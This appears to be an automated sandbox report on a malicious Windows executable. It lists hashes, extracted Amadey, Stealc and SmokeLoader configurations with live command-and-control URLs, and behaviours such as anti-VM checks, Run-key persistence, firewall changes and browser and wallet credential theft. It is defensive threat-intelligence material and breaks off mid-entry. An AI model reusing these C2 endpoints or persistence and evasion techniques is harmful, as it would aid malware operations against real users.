Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
25-03-2024 07:44
Static task
static1
Behavioral task
behavioral1
Sample
bb4a0140d4b23f0f4d334dae72e8bd9cd865158f65f7a7ed65714723a7eeec33.exe
Resource
win10v2004-20240226-en
General
-
Target
bb4a0140d4b23f0f4d334dae72e8bd9cd865158f65f7a7ed65714723a7eeec33.exe
-
Size
1.8MB
-
MD5
7ce37ff1e89c1fc09e26a921b321828c
-
SHA1
2aa177a9179e204092b4d242b0e521f1e04c1b7d
-
SHA256
bb4a0140d4b23f0f4d334dae72e8bd9cd865158f65f7a7ed65714723a7eeec33
-
SHA512
5ab44ae449329edbf9851c182a035f25ed0f34cdcd2165588bd8cd9d7c5cfcfdc348c7578c347e3b2cf05b6f259321c5a3e650dd85466bfa589dd1861339eab8
-
SSDEEP
24576:z5uspSqm7d7CzPl5iB1leYK37taZGKPbeqsnUAP8SONNDmQe47A90lDdCj8ZOf1C:0l7+PCZeYm7Az7sTPnOXfZZONpF
Malware Config
Extracted
amadey
4.18
http://193.233.132.56
-
install_dir
09fd851a4f
-
install_file
explorha.exe
-
strings_key
443351145ece4966ded809641c77cfa8
-
url_paths
/Pneh2sXQk0/index.php
Extracted
smokeloader
pub1
Extracted
stealc
http://185.172.128.209
-
url_path
/3cd2b41cbde8fc9c.php
Extracted
smokeloader
2022
http://trad-einmyus.com/index.php
http://tradein-myus.com/index.php
http://trade-inmyus.com/index.php
Extracted
amadey
4.17
http://193.233.132.167
-
strings_key
1a9519d7b465e1f4880fa09a6162d768
-
url_paths
/enigma/index.php
Signatures
-
DcRat 24 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
Processes:
schtasks.exeschtasks.exe4767d2e713f2021e8fe856e3ea638b58.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeHAxnl42jKWN9YwHZHa2OAHww.exefile300un.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeXTiiAa1fPkJ3xiLY8hB760oY.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exebb4a0140d4b23f0f4d334dae72e8bd9cd865158f65f7a7ed65714723a7eeec33.exeschtasks.exeWgtdfAK8BX6kdw8MwWOFnUAu.exepid process 4028 schtasks.exe 5904 schtasks.exe Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" 4767d2e713f2021e8fe856e3ea638b58.exe 3836 schtasks.exe 3948 schtasks.exe 5772 schtasks.exe 5504 schtasks.exe 6060 schtasks.exe 3808 schtasks.exe Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" HAxnl42jKWN9YwHZHa2OAHww.exe Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "\"C:\\Users\\Admin\\.BLRVzdv\\svchost.exe\"" file300un.exe 6388 schtasks.exe 5496 schtasks.exe 5396 schtasks.exe 436 schtasks.exe Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" XTiiAa1fPkJ3xiLY8hB760oY.exe 5216 schtasks.exe 3504 schtasks.exe 6104 schtasks.exe 4440 schtasks.exe 4448 schtasks.exe Key opened \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Wine bb4a0140d4b23f0f4d334dae72e8bd9cd865158f65f7a7ed65714723a7eeec33.exe 6872 schtasks.exe Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" WgtdfAK8BX6kdw8MwWOFnUAu.exe -
Detect ZGRat V1 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\Pictures\eazOqh4NuQfCeody6sSmmD8y.exe family_zgrat_v1 -
Glupteba payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/4732-671-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/3744-674-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
RegAsm.exedescription pid process target process PID 5836 created 2236 5836 RegAsm.exe sihost.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
Processes:
bb4a0140d4b23f0f4d334dae72e8bd9cd865158f65f7a7ed65714723a7eeec33.exeexplorha.exe4e8bb0e286.exeexplorha.exeamadka.exefH6393mwgNgh1D0guCtDCA52.exeexplorha.exeexplorha.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ bb4a0140d4b23f0f4d334dae72e8bd9cd865158f65f7a7ed65714723a7eeec33.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorha.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4e8bb0e286.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorha.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ amadka.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ fH6393mwgNgh1D0guCtDCA52.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorha.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorha.exe -
Blocklisted process makes network request 8 IoCs
Processes:
rundll32.exerundll32.exerundll32.exerundll32.exerundll32.exeflow pid process 47 1304 rundll32.exe 48 1184 rundll32.exe 157 6136 rundll32.exe 171 4688 rundll32.exe 48 1184 rundll32.exe 171 4688 rundll32.exe 244 3448 rundll32.exe 48 1184 rundll32.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 4 IoCs
Processes:
netsh.exenetsh.exenetsh.exenetsh.exepid process 5192 netsh.exe 1164 netsh.exe 5436 netsh.exe 6040 netsh.exe -
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
amadka.exefH6393mwgNgh1D0guCtDCA52.exeexplorha.exe4e8bb0e286.exeexplorha.exeInstall.exeexplorha.exebb4a0140d4b23f0f4d334dae72e8bd9cd865158f65f7a7ed65714723a7eeec33.exeexplorha.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion amadka.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion fH6393mwgNgh1D0guCtDCA52.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4e8bb0e286.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4e8bb0e286.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion amadka.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion fH6393mwgNgh1D0guCtDCA52.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion bb4a0140d4b23f0f4d334dae72e8bd9cd865158f65f7a7ed65714723a7eeec33.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion bb4a0140d4b23f0f4d334dae72e8bd9cd865158f65f7a7ed65714723a7eeec33.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorha.exe -
Checks computer location settings 2 TTPs 12 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
bb4a0140d4b23f0f4d334dae72e8bd9cd865158f65f7a7ed65714723a7eeec33.exe9tffILNsblfrBiKalVXQOm4E.exeInstall.exe6558.exeexplorha.exechrosha.exeboom8.exeISetup8.exeNDETJa6sPxmbP4JlULJ9hFAT.exeu3tw.0.exeAKEBFCFIJJ.exeZQqYSYc.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation bb4a0140d4b23f0f4d334dae72e8bd9cd865158f65f7a7ed65714723a7eeec33.exe Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation 9tffILNsblfrBiKalVXQOm4E.exe Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation 6558.exe Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation explorha.exe Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation chrosha.exe Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation boom8.exe Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation ISetup8.exe Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation NDETJa6sPxmbP4JlULJ9hFAT.exe Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation u3tw.0.exe Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation AKEBFCFIJJ.exe Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation ZQqYSYc.exe -
Executes dropped EXE 55 IoCs
Processes:
explorha.exe4e8bb0e286.exelumma21.exeexplorha.exechrosha.exeboom8.exeISetup8.exetoolspub1.exefile300un.exeu3tw.0.exeu3tw.1.exeNDETJa6sPxmbP4JlULJ9hFAT.exe9tffILNsblfrBiKalVXQOm4E.exe4767d2e713f2021e8fe856e3ea638b58.exeeazOqh4NuQfCeody6sSmmD8y.exeWgtdfAK8BX6kdw8MwWOFnUAu.exeamadka.exeXTiiAa1fPkJ3xiLY8hB760oY.exeHAxnl42jKWN9YwHZHa2OAHww.exefH6393mwgNgh1D0guCtDCA52.exeu1rc.0.exeufs.0.exeu1rc.1.exeCYoOmU856pwWKZXiUIbstHLU.exeufs.1.exeCYoOmU856pwWKZXiUIbstHLU.exeCYoOmU856pwWKZXiUIbstHLU.exeCYoOmU856pwWKZXiUIbstHLU.exePjnBLsCrGzwfVavcntySi6CQ.exeCYoOmU856pwWKZXiUIbstHLU.exeInstall.exeInstall.exeXTiiAa1fPkJ3xiLY8hB760oY.exeWgtdfAK8BX6kdw8MwWOFnUAu.exe4767d2e713f2021e8fe856e3ea638b58.exeHAxnl42jKWN9YwHZHa2OAHww.execsrss.exeAssistant_108.0.5067.20_Setup.exe_sfx.exeassistant_installer.exeassistant_installer.exeinjector.exeAKEBFCFIJJ.exeexplorha.exeOrUtnSx.exeboom8.exewindefender.exewindefender.exeZQqYSYc.exe6558.exe6558.exe6558.exe6558.exeexplorha.exeboom8.exe8054.exepid process 1492 explorha.exe 4200 4e8bb0e286.exe 4964 lumma21.exe 3744 explorha.exe 380 chrosha.exe 3680 boom8.exe 4964 ISetup8.exe 4900 toolspub1.exe 4496 file300un.exe 4668 u3tw.0.exe 3640 u3tw.1.exe 568 NDETJa6sPxmbP4JlULJ9hFAT.exe 2280 9tffILNsblfrBiKalVXQOm4E.exe 4732 4767d2e713f2021e8fe856e3ea638b58.exe 3460 eazOqh4NuQfCeody6sSmmD8y.exe 3744 WgtdfAK8BX6kdw8MwWOFnUAu.exe 5184 amadka.exe 5560 XTiiAa1fPkJ3xiLY8hB760oY.exe 5592 HAxnl42jKWN9YwHZHa2OAHww.exe 5788 fH6393mwgNgh1D0guCtDCA52.exe 6004 u1rc.0.exe 5260 ufs.0.exe 5472 u1rc.1.exe 5144 CYoOmU856pwWKZXiUIbstHLU.exe 6064 ufs.1.exe 724 CYoOmU856pwWKZXiUIbstHLU.exe 5292 CYoOmU856pwWKZXiUIbstHLU.exe 5124 CYoOmU856pwWKZXiUIbstHLU.exe 5444 PjnBLsCrGzwfVavcntySi6CQ.exe 2308 CYoOmU856pwWKZXiUIbstHLU.exe 5552 Install.exe 6120 Install.exe 6476 XTiiAa1fPkJ3xiLY8hB760oY.exe 6488 WgtdfAK8BX6kdw8MwWOFnUAu.exe 6496 4767d2e713f2021e8fe856e3ea638b58.exe 6528 HAxnl42jKWN9YwHZHa2OAHww.exe 5700 csrss.exe 1932 Assistant_108.0.5067.20_Setup.exe_sfx.exe 6852 assistant_installer.exe 6928 assistant_installer.exe 3580 injector.exe 4628 AKEBFCFIJJ.exe 780 explorha.exe 4912 OrUtnSx.exe 3744 boom8.exe 5740 windefender.exe 6244 windefender.exe 936 ZQqYSYc.exe 5688 6558.exe 3936 6558.exe 4508 6558.exe 2732 6558.exe 6488 explorha.exe 1548 boom8.exe 6344 8054.exe -
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
4e8bb0e286.exeexplorha.exeamadka.exeexplorha.exeexplorha.exebb4a0140d4b23f0f4d334dae72e8bd9cd865158f65f7a7ed65714723a7eeec33.exeexplorha.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Wine 4e8bb0e286.exe Key opened \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Wine explorha.exe Key opened \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Wine amadka.exe Key opened \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Wine explorha.exe Key opened \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Wine explorha.exe Key opened \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Wine bb4a0140d4b23f0f4d334dae72e8bd9cd865158f65f7a7ed65714723a7eeec33.exe Key opened \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Wine explorha.exe -
Loads dropped DLL 18 IoCs
Processes:
rundll32.exerundll32.exerundll32.exerundll32.exerundll32.exeCYoOmU856pwWKZXiUIbstHLU.exeCYoOmU856pwWKZXiUIbstHLU.exeCYoOmU856pwWKZXiUIbstHLU.exeCYoOmU856pwWKZXiUIbstHLU.exeCYoOmU856pwWKZXiUIbstHLU.exeu3tw.0.exerundll32.exeassistant_installer.exeassistant_installer.exerundll32.exepid process 4496 rundll32.exe 1304 rundll32.exe 1184 rundll32.exe 6072 rundll32.exe 6136 rundll32.exe 5144 CYoOmU856pwWKZXiUIbstHLU.exe 724 CYoOmU856pwWKZXiUIbstHLU.exe 5292 CYoOmU856pwWKZXiUIbstHLU.exe 5124 CYoOmU856pwWKZXiUIbstHLU.exe 2308 CYoOmU856pwWKZXiUIbstHLU.exe 4668 u3tw.0.exe 4668 u3tw.0.exe 4688 rundll32.exe 6852 assistant_installer.exe 6852 assistant_installer.exe 6928 assistant_installer.exe 6928 assistant_installer.exe 3448 rundll32.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Pictures\fH6393mwgNgh1D0guCtDCA52.exe themida C:\Users\Admin\Pictures\fH6393mwgNgh1D0guCtDCA52.exe themida C:\Users\Admin\Pictures\fH6393mwgNgh1D0guCtDCA52.exe themida behavioral1/memory/5788-446-0x00007FF6BA1A0000-0x00007FF6BAB80000-memory.dmp themida behavioral1/memory/5788-450-0x00007FF6BA1A0000-0x00007FF6BAB80000-memory.dmp themida behavioral1/memory/5788-457-0x00007FF6BA1A0000-0x00007FF6BAB80000-memory.dmp themida behavioral1/memory/5788-479-0x00007FF6BA1A0000-0x00007FF6BAB80000-memory.dmp themida behavioral1/memory/5788-483-0x00007FF6BA1A0000-0x00007FF6BAB80000-memory.dmp themida behavioral1/memory/5788-463-0x00007FF6BA1A0000-0x00007FF6BAB80000-memory.dmp themida -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\u3tw.1.exe upx behavioral1/memory/3640-253-0x0000000000400000-0x0000000000930000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\u1rc.1.exe upx C:\Users\Admin\AppData\Local\Temp\u1rc.1.exe upx C:\Users\Admin\Pictures\CYoOmU856pwWKZXiUIbstHLU.exe upx C:\Users\Admin\Pictures\CYoOmU856pwWKZXiUIbstHLU.exe upx C:\Users\Admin\Pictures\CYoOmU856pwWKZXiUIbstHLU.exe upx C:\Users\Admin\Pictures\CYoOmU856pwWKZXiUIbstHLU.exe upx C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\CYoOmU856pwWKZXiUIbstHLU.exe upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 9 IoCs
Processes:
explorha.exechrosha.exe4767d2e713f2021e8fe856e3ea638b58.exeWgtdfAK8BX6kdw8MwWOFnUAu.exefile300un.exeXTiiAa1fPkJ3xiLY8hB760oY.exeHAxnl42jKWN9YwHZHa2OAHww.execsrss.exe6558.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4e8bb0e286.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000022001\\4e8bb0e286.exe" explorha.exe Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\amadka.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000087001\\amadka.exe" chrosha.exe Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" 4767d2e713f2021e8fe856e3ea638b58.exe Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" WgtdfAK8BX6kdw8MwWOFnUAu.exe Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "\"C:\\Users\\Admin\\.BLRVzdv\\svchost.exe\"" file300un.exe Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" XTiiAa1fPkJ3xiLY8hB760oY.exe Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" HAxnl42jKWN9YwHZHa2OAHww.exe Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\13321316-cf0e-4435-9812-5e7fd2442ecd\\6558.exe\" --AutoStart" 6558.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
fH6393mwgNgh1D0guCtDCA52.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA fH6393mwgNgh1D0guCtDCA52.exe -
Drops Chrome extension 2 IoCs
Processes:
ZQqYSYc.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json ZQqYSYc.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json ZQqYSYc.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
ZQqYSYc.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini ZQqYSYc.exe -
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
CYoOmU856pwWKZXiUIbstHLU.exeCYoOmU856pwWKZXiUIbstHLU.exedescription ioc process File opened (read-only) \??\F: CYoOmU856pwWKZXiUIbstHLU.exe File opened (read-only) \??\D: CYoOmU856pwWKZXiUIbstHLU.exe File opened (read-only) \??\F: CYoOmU856pwWKZXiUIbstHLU.exe File opened (read-only) \??\D: CYoOmU856pwWKZXiUIbstHLU.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 249 api.2ip.ua 143 api.myip.com 144 api.myip.com 146 ipinfo.io 147 ipinfo.io 247 api.2ip.ua -
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
Processes:
csrss.exedescription ioc process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 48 IoCs
Processes:
powershell.exeZQqYSYc.exefH6393mwgNgh1D0guCtDCA52.exepowershell.exepowershell.exepowershell.exepowershell.exeInstall.exepowershell.exepowershell.exeOrUtnSx.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache ZQqYSYc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 ZQqYSYc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 ZQqYSYc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA ZQqYSYc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 ZQqYSYc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA ZQqYSYc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_E6E5AFC8E26F79D2A2EBCDC0BC547682 ZQqYSYc.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI fH6393mwgNgh1D0guCtDCA52.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content ZQqYSYc.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol fH6393mwgNgh1D0guCtDCA52.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE ZQqYSYc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_97FAD8EBB31B0B74F135144564816C0E ZQqYSYc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_E7BE3A16BEFC370B1A2E61CE6CF7E661 ZQqYSYc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA ZQqYSYc.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol OrUtnSx.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini OrUtnSx.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_E6E5AFC8E26F79D2A2EBCDC0BC547682 ZQqYSYc.exe File opened for modification C:\Windows\System32\GroupPolicy fH6393mwgNgh1D0guCtDCA52.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData ZQqYSYc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 ZQqYSYc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies ZQqYSYc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_E7BE3A16BEFC370B1A2E61CE6CF7E661 ZQqYSYc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 ZQqYSYc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft ZQqYSYc.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol ZQqYSYc.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created 